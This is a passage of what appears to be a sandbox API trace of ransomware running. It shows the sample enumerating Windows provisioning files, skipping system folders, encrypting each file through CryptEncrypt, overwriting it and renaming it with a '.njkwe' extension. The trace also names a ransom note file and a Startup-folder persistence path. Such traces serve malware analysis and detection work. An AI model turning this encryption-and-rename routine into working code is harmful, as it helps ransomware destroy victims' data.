Flags=0x8, Size=0x400) returned 0xc472e0 [0081.597] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0081.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\515__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\515__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.597] GetProcessHeap () returned 0xbe0000 [0081.597] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.597] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912866d8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912866d8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912866d8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="516__C~1.PRO")) returned 1 [0081.597] lstrcmpiW (lpString1="516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.597] lstrcmpiW (lpString1="516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.598] lstrcmpiW (lpString1="516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.598] lstrcmpiW (lpString1="516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.598] lstrcmpiW (lpString1="516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.598] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml") returned 168 [0081.598] StrStrIW (lpFirst="516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.598] lstrcmpW (lpString1="516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.598] lstrcmpW (lpString1="516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.598] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\516__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.598] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\516__connections_cellular_uzdunrobita (uzbekistan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.599] GetTickCount () returned 0x1154b5d [0081.599] GetTickCount () returned 0x1154b5d [0081.599] GetTickCount () returned 0x1154b5d [0081.599] GetTickCount () returned 0x1154b5d [0081.599] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.599] GetProcessHeap () returned 0xbe0000 [0081.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.599] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0081.600] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.600] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0081.600] GetProcessHeap () returned 0xbe0000 [0081.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.600] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.601] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.601] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.601] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.601] CloseHandle (hObject=0x43c) returned 1 [0081.601] GetProcessHeap () returned 0xbe0000 [0081.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.601] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0081.601] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\516__connections_cellular_uzdunrobita (uzbekistan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\516__Connections_Cellular_Uzdunrobita (Uzbekistan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\516__connections_cellular_uzdunrobita (uzbekistan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.602] GetProcessHeap () returned 0xbe0000 [0081.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.602] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912866d8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912866d8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912866d8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x294, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml", cAlternateFileName="517__C~1.PRO")) returned 1 [0081.602] lstrcmpiW (lpString1="517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.602] lstrcmpiW (lpString1="517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.602] lstrcmpiW (lpString1="517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.602] lstrcmpiW (lpString1="517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.602] lstrcmpiW (lpString1="517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.602] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml") returned 166 [0081.602] StrStrIW (lpFirst="517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.602] lstrcmpW (lpString1="517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.602] lstrcmpW (lpString1="517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.602] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\517__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.602] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\517__connections_cellular_telefonica (venezuela)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.603] GetTickCount () returned 0x1154b5d [0081.603] GetTickCount () returned 0x1154b5d [0081.603] GetTickCount () returned 0x1154b5d [0081.603] GetTickCount () returned 0x1154b5d [0081.603] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.603] GetProcessHeap () returned 0xbe0000 [0081.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.603] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x294, lpOverlapped=0x0) returned 1 [0081.604] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.604] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x294, lpOverlapped=0x0) returned 1 [0081.604] GetProcessHeap () returned 0xbe0000 [0081.604] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.604] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.605] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.605] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.605] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.605] CloseHandle (hObject=0x43c) returned 1 [0081.605] GetProcessHeap () returned 0xbe0000 [0081.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.605] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0081.605] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\517__connections_cellular_telefonica (venezuela)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\517__Connections_Cellular_Telefonica (Venezuela)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\517__connections_cellular_telefonica (venezuela)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.606] GetProcessHeap () returned 0xbe0000 [0081.606] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.606] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912866d8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912866d8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912866d8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml", cAlternateFileName="518__C~1.PRO")) returned 1 [0081.606] lstrcmpiW (lpString1="518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.606] lstrcmpiW (lpString1="518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.606] lstrcmpiW (lpString1="518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.606] lstrcmpiW (lpString1="518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.606] lstrcmpiW (lpString1="518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.606] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml") returned 161 [0081.606] StrStrIW (lpFirst="518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.606] lstrcmpW (lpString1="518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.606] lstrcmpW (lpString1="518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.606] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\518__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.606] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\518__connections_cellular_viettel (vietnam)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.606] GetTickCount () returned 0x1154b5d [0081.606] GetTickCount () returned 0x1154b5d [0081.606] GetTickCount () returned 0x1154b5d [0081.606] GetTickCount () returned 0x1154b5d [0081.606] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.607] GetProcessHeap () returned 0xbe0000 [0081.607] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.607] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x285, lpOverlapped=0x0) returned 1 [0081.624] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.625] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x285, lpOverlapped=0x0) returned 1 [0081.625] GetProcessHeap () returned 0xbe0000 [0081.625] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.625] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.625] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.625] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.625] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.625] CloseHandle (hObject=0x43c) returned 1 [0081.625] GetProcessHeap () returned 0xbe0000 [0081.625] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.625] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0081.625] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\518__connections_cellular_viettel (vietnam)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\518__Connections_Cellular_Viettel (Vietnam)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\518__connections_cellular_viettel (vietnam)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.626] GetProcessHeap () returned 0xbe0000 [0081.627] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.627] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912866d8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912866d8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912866d8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml", cAlternateFileName="519__C~1.PRO")) returned 1 [0081.627] lstrcmpiW (lpString1="519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.627] lstrcmpiW (lpString1="519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.627] lstrcmpiW (lpString1="519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.627] lstrcmpiW (lpString1="519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.627] lstrcmpiW (lpString1="519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.627] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml") returned 163 [0081.627] StrStrIW (lpFirst="519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.627] lstrcmpW (lpString1="519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.627] lstrcmpW (lpString1="519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.627] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\519__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.627] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\519__connections_cellular_vinaphone (vietnam)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.627] GetTickCount () returned 0x1154b7c [0081.627] GetTickCount () returned 0x1154b7c [0081.627] GetTickCount () returned 0x1154b7c [0081.627] GetTickCount () returned 0x1154b7c [0081.627] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.628] GetProcessHeap () returned 0xbe0000 [0081.628] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.628] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0081.629] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.629] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, 